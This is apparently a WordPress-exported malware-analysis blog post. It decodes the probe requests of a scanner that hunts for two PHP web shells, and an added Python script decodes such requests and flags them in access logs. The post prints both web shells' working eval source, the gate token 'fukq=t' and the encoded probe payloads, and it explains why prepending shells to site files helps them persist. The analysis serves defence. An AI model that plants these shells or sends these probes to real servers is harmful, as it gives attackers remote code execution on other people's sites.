{"id":29,"date":"2023-11-26T00:15:27","date_gmt":"2023-11-26T00:15:27","guid":{"rendered":"https:\/\/ticklemeelmo.com\/malware\/?p=29"},"modified":"2023-11-26T00:26:50","modified_gmt":"2023-11-26T00:26:50","slug":"malware-scanner-spreader-targeting-php-shells","status":"publish","type":"post","link":"https:\/\/syschan.org\/malware\/malware-scanner-spreader-targeting-php-shells\/","title":{"rendered":"Malware Scanner\/Spreader Targeting PHP Shells"},"content":{"rendered":"\n<p>A while back an abuse complaint was forwarded to me by someone requesting information about the HTTP requests contained in the complaint. Below is a select sample of the values from the requests outlined in the complaint:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[codez] => echo%2520%2528123454320%252B1%2529%253Bexit%2528%2529%253B\n[z0] => ZXZhbCgnZWNobyAoMTIzNDU0MzIwKzEpO2V4aXQoKTsnKTs\n[fuckyou4321] => eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));\n[fukq] => t<\/pre>\n\n\n\n<p>So what\u2019s it doing? 
Let\u2019s start by analyzing the above strings:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>z0<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[z0] => ZXZhbCgnZWNobyAoMTIzNDU0MzIwKzEpO2V4aXQoKTsnKTs<\/pre>\n\n\n\n<p>This string is base64 encoded. Note the missing trailing <code>=<\/code> padding: PHP\u2019s base64_decode() accepts unpadded input in its default non-strict mode, so the payload still decodes. It decodes to:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">eval('echo (123454320+1);exit();');<\/pre>\n\n\n\n<ol class=\"wp-block-list\" start=\"2\">\n<li>codez<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[codez] => echo%2520%2528123454320%252B1%2529%253Bexit%2528%2529%253B<\/pre>\n\n\n\n<p>This value has been URL-encoded twice: <code>%2520<\/code> decodes to <code>%20<\/code>, which in turn decodes to a space, and likewise for the other <code>%25xx<\/code> sequences. 
Decoded, it is:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo (123454320+1);exit();<\/pre>\n\n\n\n<ol class=\"wp-block-list\" start=\"3\">\n<li>fuckyou4321<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[fuckyou4321] => eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));<\/pre>\n\n\n\n<p>The <code>chr()<\/code> chain spells out a parameter name: 99, 111, 100, 101 and 122 are the ASCII codes for <code>c<\/code>, <code>o<\/code>, <code>d<\/code>, <code>e<\/code> and <code>z<\/code>. This payload therefore double-URL-decodes and executes the \u201ccodez\u201d value above; the only thing the obfuscation hides is the literal string <code>codez<\/code> from naive pattern matching. With the name resolved it reads:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">eval(urldecode(urldecode($_POST['codez'])));<\/pre>\n\n\n\n<ol class=\"wp-block-list\" start=\"4\">\n<li>fukq<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[fukq] => t<\/pre>\n\n\n\n<p>This one isn\u2019t encoded, but it is important: it is a fixed gate value that one of the shells below checks before it will execute anything.<\/p>\n\n\n\n<p>Okay, so what are these requests all about?<\/p>\n\n\n\n<p>As luck would have it, I had two malware samples archived from previous investigations, both of them PHP shells, which I recognized as being related to these requests.<\/p>\n\n\n\n<p>Shell 1:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">&lt;?php eval(base64_decode($_REQUEST['z0'])); 
?><\/pre>\n\n\n\n<p>Functionally, it executes base64-encoded PHP code supplied in the \u201cz0\u201d parameter via GET or POST (<code>$_REQUEST<\/code> may also include cookies, depending on PHP\u2019s <code>request_order<\/code> setting). Look familiar?<\/p>\n\n\n\n<p>During previous investigations I have found this particular web shell prepended to PHP files that the site needs in order to function. Prepending the code to an existing, writable PHP file means that any malware scan which quarantines the file takes the site down with it. This appears to be a deliberate persistence technique: the pressure to get the site back online increases the chance that the quarantined file is simply restored, which makes the backdoor accessible to the attacker again. In numerous cases I have seen this shell \u201ccrypted\u201d using a variety of methods, in an apparent effort to avoid detection by signature-based anti-malware software.<\/p>\n\n\n\n<p>Shell 2:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">&lt;?php\n$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}\necho apiRequest();\nfunction apiRequest(){\n\tif(@$_GET['op'] == 'check')\n\t\t{\n\t\t return \"connectjbmoveisok\";\n\t\t exit();\n\t    }\n}\n?><\/pre>\n\n\n\n<p>This is another web shell, which executes PHP code passed to it in the POST parameter \u201cfuckyou4321\u201d and echoes eval()\u2019s return value (the payload seen above prints its own result and calls exit(), so the marker in the response comes from the payload itself). Its <code>op=check<\/code> branch returns the fixed string <code>connectjbmoveisok<\/code> to anyone who asks, which makes a convenient liveness fingerprint. 
The PHP code passed to the shell only executes, however, if the GET parameter \u201cfukq\u201d contains the value \u201ct\u201d \u2013 a crude access gate added by the shell\u2019s author. A static token hard-coded in the source is no secret to anyone who has recovered a copy of the shell, and that is exactly what this scanner relies on.<\/p>\n\n\n\n<p>So if you haven\u2019t caught on yet, this is what\u2019s happening\u2026<\/p>\n\n\n\n<p>The requests in the provided abuse complaint all attempt to execute PHP code through a number of different web shells commonly hidden in infected site files.<\/p>\n\n\n\n<p>The scanner accomplishes this by making requests to paths belonging to commonly exploited CMSs, plugins and themes, the places where these shells are typically dropped.<\/p>\n\n\n\n<p>These requests conform to the expected operation (GET\/POST parameter names, encoding layers, gate values) of the web shells the attacker is attempting to locate.<\/p>\n\n\n\n<p>If one of these requests returns a response containing \u201c123454321\u201d (the result of the PHP code \u201cecho (123454320+1);\u201d being executed) the attacker has located a web shell and confirmed their ability to remotely execute PHP through it, allowing them to further exploit the server. Using an expression rather than a literal has a practical benefit: a page that merely reflects request parameters would echo back <code>123454320+1<\/code>, so the marker <code>123454321<\/code> only appears when PHP actually evaluated the payload, and it is specific enough not to occur in ordinary page content by accident.<\/p>\n\n\n\n<p>Final Thoughts:<\/p>\n\n\n\n<p>It is unclear at this time if the shells being targeted by this scanner are related to botnets which have been orphaned by C2 takedowns or similar circumstances, or if they are part of currently active botnets which are being exploited and abused by an additional malicious actor or actors.<\/p>\n\n\n\n<p>I found this spreader\u2019s method of exploiting common web shells particularly interesting, as in my experience it is rather uncommon compared to more \u201ctraditional\u201d methods such as automating the exploitation of vulnerabilities present in legitimate web applications.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A while back an abuse complaint was forwarded to me by someone requesting 
information about the HTTP requests contained in the complaint. Below is a select sample of the values from the requests outlined in the complaint: So what\u2019s it doing? Let\u2019s start by analyzing the above strings: This string is base64 encoded, and decodes [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-29","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/comments?post=29"}],"version-history":[{"count":9,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29\/revisions"}],"predecessor-version":[{"id":81,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29\/revisions\/81"}],"wp:attachment":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/media?parent=29"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/categories?post=29"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/tags?post=29"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
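Worked example, added here and not code from the original post: a Python script that reproduces the decoding steps the post walks through (double URL-decoding, unpadded base64, PHP chr() concatenation), classifies a captured request against the two shells' protocols, and flags the GET-side fingerprints that survive in an ordinary access log. The parameter values are the ones quoted from the abuse complaint; the request paths, log lines and function names are constructed for illustration.

```python
"""Decode and classify probes aimed at the two PHP web shells above.

Added example, not code from the original post. It reproduces the manual
analysis (double URL-decoding, unpadded base64, PHP chr() concatenation)
and flags which shell protocol a captured request follows. The parameter
values are the ones quoted from the abuse complaint; the access-log lines,
paths and function names are constructed for illustration.
"""
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Marker the scanner expects in a response when "echo (123454320+1);" really ran.
EXEC_MARKER = "123454321"
# Fixed reply of shell 2's unauthenticated op=check branch (from the sample above).
CHECK_TOKEN = "connectjbmoveisok"

_CHR_CHAIN = re.compile(r"(?:chr\(\d+\)\s*\.\s*)+chr\(\d+\)")


def resolve_chr_concat(php: str) -> str:
    """Replace chr(99).chr(111)... chains with the single-quoted string they spell."""
    def spell(m):
        codes = re.findall(r"chr\((\d+)\)", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return _CHR_CHAIN.sub(spell, php)


def b64_decode_lenient(s: str) -> str:
    """Mimic PHP's non-strict base64_decode(): accept input with missing '=' padding."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("utf-8", "replace")


def double_urldecode(s: str) -> str:
    """Undo two rounds of urlencode(), e.g. %2520 -> %20 -> ' '."""
    return unquote(unquote(s))


def analyze_request(query: dict, post: dict) -> dict:
    """Map a request's parameters to the shell(s) it targets and the PHP each would run."""
    findings = {}
    # Shell 1 reads $_REQUEST['z0'], so GET or POST both work.
    z0 = post.get("z0", query.get("z0"))
    if z0 is not None:
        findings["shell1_z0"] = b64_decode_lenient(z0)
    # Shell 2 only evaluates fuckyou4321 when the GET gate fukq=t is present.
    if query.get("fukq") == "t" and "fuckyou4321" in post:
        stage1 = resolve_chr_concat(post["fuckyou4321"])
        findings["shell2_stage1"] = stage1
        # Stage 1 is itself a loader: eval(urldecode(urldecode($_POST['codez'])))
        ref = re.search(r"\$_POST\['([^']+)'\]", stage1)
        if ref and ref.group(1) in post:
            findings["shell2_stage2"] = double_urldecode(post[ref.group(1)])
    if query.get("op") == "check":
        findings["shell2_check_expects"] = CHECK_TOKEN
    return findings


def response_confirms_execution(body: str) -> bool:
    """A reflected body would contain '123454320+1'; only evaluated PHP yields the marker."""
    return EXEC_MARKER in body


def flag_access_log_line(line: str) -> list:
    """Flag the GET-side fingerprints visible in a combined-format access log.

    POST bodies are not logged, so fuckyou4321/codez cannot be seen here; the
    gate fukq=t, the op=check probe and a GET-supplied z0 can.
    """
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return []
    qs = parse_qs(urlsplit(m.group(1)).query)
    hits = []
    if qs.get("fukq") == ["t"]:
        hits.append("shell2-gate")
    if qs.get("op") == ["check"]:
        hits.append("shell2-check")
    if "z0" in qs:
        hits.append("shell1-z0")
    return hits


# Constructed sample mirroring the parameters quoted in the abuse complaint.
SAMPLE_QUERY = {"fukq": "t"}
SAMPLE_POST = {
    "codez": "echo%2520%2528123454320%252B1%2529%253Bexit%2528%2529%253B",
    "z0": "ZXZhbCgnZWNobyAoMTIzNDU0MzIwKzEpO2V4aXQoKTsnKTs",
    "fuckyou4321": "eval(urldecode(urldecode($_POST[chr(99).chr(111)"
                   ".chr(100).chr(101).chr(122)])));",
}
# Constructed access-log lines (paths are illustrative, not from the complaint).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Nov/2023:10:00:00 +0000] "POST /wp-content/plugins/x/y.php?fukq=t HTTP/1.1" 200 9 "-" "-"',
    '203.0.113.7 - - [01/Nov/2023:10:00:01 +0000] "GET /index.php?op=check HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.2 - - [01/Nov/2023:10:00:02 +0000] "GET /index.php?p=1 HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for name, php in analyze_request(SAMPLE_QUERY, SAMPLE_POST).items():
        print(f"{name}: {php}")
    for line in SAMPLE_LOG:
        print(flag_access_log_line(line) or "clean", "<-", line.split('"')[1])
```

The access-log helper is deliberately limited to what a combined-format log records: the `fukq=t` gate and `op=check` probe travel in the query string and are visible, while the `fuckyou4321` and `codez` payloads travel in the POST body and are not, so confirming an actual execution attempt needs request-body capture (WAF, reverse-proxy or PHP-level logging) or a response body containing `123454321`.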